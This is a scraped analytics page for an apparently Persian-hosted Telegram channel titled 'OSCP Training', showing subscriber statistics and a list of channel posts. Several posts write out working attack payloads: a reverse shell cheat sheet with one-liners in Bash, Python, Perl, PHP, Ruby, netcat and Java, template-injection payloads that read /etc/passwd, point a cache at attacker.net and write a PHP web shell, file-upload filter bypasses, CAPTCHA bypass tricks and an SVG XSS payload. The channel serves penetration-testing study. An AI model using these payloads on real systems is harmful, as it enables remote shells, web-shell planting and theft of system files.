fa
Feedback
🔥OSCP Training🔥🛡⚔️👨🏻‍💻

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

رفتن به کانال در Telegram

Offensive Security Certified Professional @CEH_training @WebHacking @pfsense @WifiHacking 🔰For safer days

نمایش بیشتر
کشور مشخص نشده استفناوری و برنامه‌ها11 688
7 490
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+37 روز
-2030 روز

در حال بارگیری داده...

کانال‌های مشابه
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسب‌ها
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
مارس '25
مارس '250
در 0 کانال‌ها
فوریه '25
+56
در 0 کانال‌ها
Get PRO
ژانویه '25
+61
در 0 کانال‌ها
Get PRO
دسامبر '24
+62
در 0 کانال‌ها
Get PRO
نوامبر '24
+74
در 0 کانال‌ها
Get PRO
اکتبر '24
+90
در 0 کانال‌ها
Get PRO
سپتامبر '24
+114
در 0 کانال‌ها
Get PRO
اوت '24
+156
در 0 کانال‌ها
Get PRO
ژوئیه '24
+185
در 0 کانال‌ها
Get PRO
ژوئن '24
+219
در 1 کانال‌ها
Get PRO
مه '24
+259
در 0 کانال‌ها
Get PRO
آوریل '24
+193
در 1 کانال‌ها
Get PRO
مارس '24
+133
در 1 کانال‌ها
Get PRO
فوریه '24
+179
در 0 کانال‌ها
Get PRO
ژانویه '24
+189
در 3 کانال‌ها
Get PRO
دسامبر '23
+188
در 2 کانال‌ها
Get PRO
نوامبر '23
+176
در 0 کانال‌ها
Get PRO
اکتبر '23
+154
در 1 کانال‌ها
Get PRO
سپتامبر '23
+204
در 0 کانال‌ها
Get PRO
اوت '23
+255
در 0 کانال‌ها
Get PRO
ژوئیه '23
+297
در 0 کانال‌ها
Get PRO
ژوئن '23
+239
در 0 کانال‌ها
Get PRO
مه '23
+266
در 0 کانال‌ها
Get PRO
آوریل '23
+218
در 0 کانال‌ها
Get PRO
مارس '23
+244
در 0 کانال‌ها
Get PRO
فوریه '23
+231
در 0 کانال‌ها
Get PRO
ژانویه '23
+256
در 0 کانال‌ها
Get PRO
دسامبر '22
+222
در 0 کانال‌ها
Get PRO
نوامبر '22
+247
در 0 کانال‌ها
Get PRO
اکتبر '22
+220
در 0 کانال‌ها
Get PRO
سپتامبر '22
+247
در 0 کانال‌ها
Get PRO
اوت '22
+199
در 0 کانال‌ها
Get PRO
ژوئیه '22
+230
در 0 کانال‌ها
Get PRO
ژوئن '22
+187
در 0 کانال‌ها
Get PRO
مه '22
+139
در 0 کانال‌ها
Get PRO
آوریل '22
+464
در 0 کانال‌ها
Get PRO
مارس '220
در 0 کانال‌ها
Get PRO
فوریه '220
در 0 کانال‌ها
Get PRO
ژانویه '220
در 0 کانال‌ها
Get PRO
دسامبر '21
+107
در 0 کانال‌ها
Get PRO
نوامبر '21
+139
در 0 کانال‌ها
Get PRO
اکتبر '21
+231
در 0 کانال‌ها
Get PRO
سپتامبر '21
+120
در 0 کانال‌ها
Get PRO
اوت '21
+135
در 0 کانال‌ها
Get PRO
ژوئیه '21
+143
در 0 کانال‌ها
Get PRO
ژوئن '21
+150
در 0 کانال‌ها
Get PRO
مه '21
+138
در 0 کانال‌ها
Get PRO
آوریل '21
+163
در 0 کانال‌ها
Get PRO
مارس '21
+165
در 0 کانال‌ها
Get PRO
فوریه '21
+192
در 0 کانال‌ها
Get PRO
ژانویه '21
+247
در 0 کانال‌ها
Get PRO
دسامبر '20
+1 077
در 0 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
02 مارس0
01 مارس0
پست‌های کانال
2
بدون متن...
2 574
3
بدون متن...
2 924
4
Wireshark.pdf
2 737
5
Web Application Lab Setup Guide .pdf
2 700
6
OSCP Cheat Sheet-2.pdf
3 967
7
RedTeam Scenarios.pdf.pdf
299
8
OSCP Exam Report.pdf
3 954
9
OSCP Notes 2.pdf
4 919
10
بدون متن...
4 755
11
File Upload Bypass - Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .ph
File Upload Bypass - Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml Jsp → .jsp, .jspx, .jsw, .jsv, .jspf Coldfusion → .cfm, .cfml, .cfc, .dbm Perl → .pl, .cgi Using random capitalization → .pHp, .pHP5, .PhAr Whitelisting Bypass file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php#.png file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png file.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg
3 953
12
@OSCP_training @WebHacking
@OSCP_training @WebHacking
3 335
13
SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %>
SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %> #{3*3} #{ 3 * 3 } [[3*3]] ${2*2} @(3*3) ${= 3*3} {{= 7*7}} ${{7*7}} #{7*7} [=7*7] {{ request }} {{self}} {{dump(app)}} {{ [] .class.base.subclassesO }} {{''.class.mro()[l] .subclassesO}} for c in [1,2,3] %}{{ c,c,c }}{% endfor %} {{ []._class.base.subclasses_O }} {{['cat%20/etc/passwd']|filter('system')}} PHP {php}print "Hello"{/php} {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} {{dump(app)}} {{app.request.server.all|join(',')}} "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {$smarty.version} {php}echo id;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} Python {% debug %} {{settings.SECRET_KEY}} {% import foobar %} = Error {% import os %}{{os.system('whoami')}}
3 178
14
Google Dorks to Find Sensitive data or dir
Google Dorks to Find Sensitive data or dir
2 295
15
APIs Fuzzing for Bug Bounty.pdf
2 863
16
CAPTCHA Bypass * Send old captcha value. * Send old captcha value with old session ID. * Remove captcha with any adblocker and request again * Bypass with OCR * Response manipulation. * Use any token with the same length(+1/-1). * Remove the param value or remove the entire parameter. * Change the method from POST to GET(or PUT) and remove the captcha. * Change body to JSON or vice-versa. * Check whether the value of the captcha is in the source code. * Add headers: X-Forwarded-Host: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Host: 127.0.0.1
3 709
17
Tryhackme.pdf
5 849
18
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml"> <foreignObject width="100%" height="100%"> <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
4 930
19
WhatsApp'ta OSCP Training kanalını takip edin: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a
2 745
20
Reverse Shell Cheat Sheet Bash; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Python; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PERL; perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP; php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby; ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat; nc -e /bin/sh 10.0.0.1 1234 Java; r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm; xterm -display 10.0.0.1:1
3 037